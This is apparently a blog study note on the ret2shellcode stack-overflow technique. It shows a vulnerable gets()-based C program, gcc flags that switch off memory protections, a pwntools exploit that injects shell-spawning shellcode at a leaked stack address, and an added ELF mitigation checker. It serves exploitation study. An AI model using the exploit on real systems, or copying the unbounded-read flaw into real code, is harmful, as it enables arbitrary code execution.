ret2shellcode
jerem1ah Lv4


https://uuzdaisuki.com/2020/02/24/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B9%8Bret2shellcode/

http://www.mi1k7ea.com/2019/03/03/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B9%8Bret2shellcode/

https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2shellcode

https://blog.csdn.net/m0_43405474/article/details/126546838

```c
#include <stdio.h>   /* needed for gets() and puts() */
#include <string.h>
#include <stdlib.h>
char buf[128];

int func(){
    char msg[100];
    gets(msg);          /* unbounded read: the deliberate stack overflow */
    strcpy(buf,msg);    /* copies the input into the global buf as well */
    puts(msg);
    return 0;
}
int main(){
    func();
    return 0;
}
```
```shell
gcc -g -fno-stack-protector -no-pie -z execstack -o test test.c

gcc -g -fno-stack-protector -no-pie -z execstack -z norelro -o test test.c
gcc -z execstack -no-pie -z norelro -fno-stack-protector test.c -o test
```


The ret2shellcode technique requires the operating system to have address space layout randomization (ASLR) disabled and the program's call stack to be executable.
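As an added defender-side check (not code from the original post or the articles it links), the following Python parses the ELF program headers and reports whether a binary was built with the protections that ret2shellcode needs disabled: NX (PT_GNU_STACK without the execute bit), PIE (ET_DYN), and RELRO (PT_GNU_RELRO). The sample image is constructed inline so the check runs offline; stack-canary detection, which needs the symbol table, is left out.

```python
import struct

# Constants from the ELF specification / Linux ABI
PT_GNU_STACK = 0x6474E551   # carries the requested stack permissions
PT_GNU_RELRO = 0x6474E552   # present only when RELRO is enabled
PF_R, PF_W, PF_X = 0x4, 0x2, 0x1
ET_EXEC, ET_DYN = 2, 3      # fixed-address binary vs. PIE
EM_X86_64 = 62

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # Elf64_Ehdr, little-endian
PHDR = struct.Struct("<IIQQQQQQ")          # Elf64_Phdr


def check_mitigations(elf: bytes) -> dict:
    """Report NX / PIE / RELRO for a little-endian ELF64 image, checksec-style."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    hdr = EHDR.unpack_from(elf, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    stack_flags, relro = None, False
    for i in range(e_phnum):
        p_type, p_flags = PHDR.unpack_from(elf, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            relro = True
    # A missing PT_GNU_STACK is treated as executable here: that was the
    # historical x86 default, so it is the conservative call for a scanner.
    nx = stack_flags is not None and not (stack_flags & PF_X)
    return {"nx": nx, "pie": e_type == ET_DYN, "relro": relro}


def build_sample_elf(exec_stack: bool, pie: bool, relro: bool) -> bytes:
    """Constructed header-only ELF64 image (no code) so the check runs offline."""
    phdrs = [(PT_GNU_STACK, PF_R | PF_W | (PF_X if exec_stack else 0))]
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R))
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)   # ELF64, LE, version 1
    ehdr = EHDR.pack(ident, ET_DYN if pie else ET_EXEC, EM_X86_64, 1, 0,
                     EHDR.size, 0, 0, EHDR.size, PHDR.size, len(phdrs), 0, 0, 0)
    body = b"".join(PHDR.pack(t, f, 0, 0, 0, 0, 0, 0x10) for t, f in phdrs)
    return ehdr + body


if __name__ == "__main__":
    # Same layout the page's `-z execstack -no-pie -z norelro` build produces
    print("CTF build    :", check_mitigations(build_sample_elf(True, False, False)))
    # What a default toolchain build looks like
    print("default build:", check_mitigations(build_sample_elf(False, True, True)))
```

To run it against a real file, pass `open(path, "rb").read()` to `check_mitigations`; any result with `nx` or `pie` False is a binary that the technique on this page can target.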

The one above doesn't work; see Xiao Ye's code below.

```c
#include <stdio.h>
#include <string.h>

int func(){
    char msg[100];
    printf("gift: %p\n", &msg);   /* leaks the buffer address to the caller */
    gets(msg);                    /* unbounded read: the deliberate overflow */
    return 0;
}
int main(){
    func();
    return 0;
}
```
```shell
gcc -g -fno-stack-protector -no-pie -z execstack -z norelro -o test test.c
```
```python
from pwn import *
context.log_level = "debug"
context.terminal = ["bash"]

p = gdb.debug("/home/pwn/06ret2shellcode/test","break main")
# p = process("/home/pwn/06ret2shellcode/test")

p.recvline()
gift = p.recvline().decode().strip().split(" ")[-1]
gift = int(gift, 16)
print(gift)

# payload = cyclic(0x70) + p64(gift + 0x70 + 0x08) + asm(shellcraft.amd64.linux.sh(),arch="amd64")
payload = flat([cyclic(0x70 + 0x08) , p64(gift + 0x70 + 0x08 + 0x08) , asm(shellcraft.amd64.linux.sh(),arch="amd64")])

p.sendline(payload)
p.interactive()
```


At first I forgot to pad rbp. Oh right, there was also the amd64 part. And the gdb.debug debugging part. All of them were pitfalls.
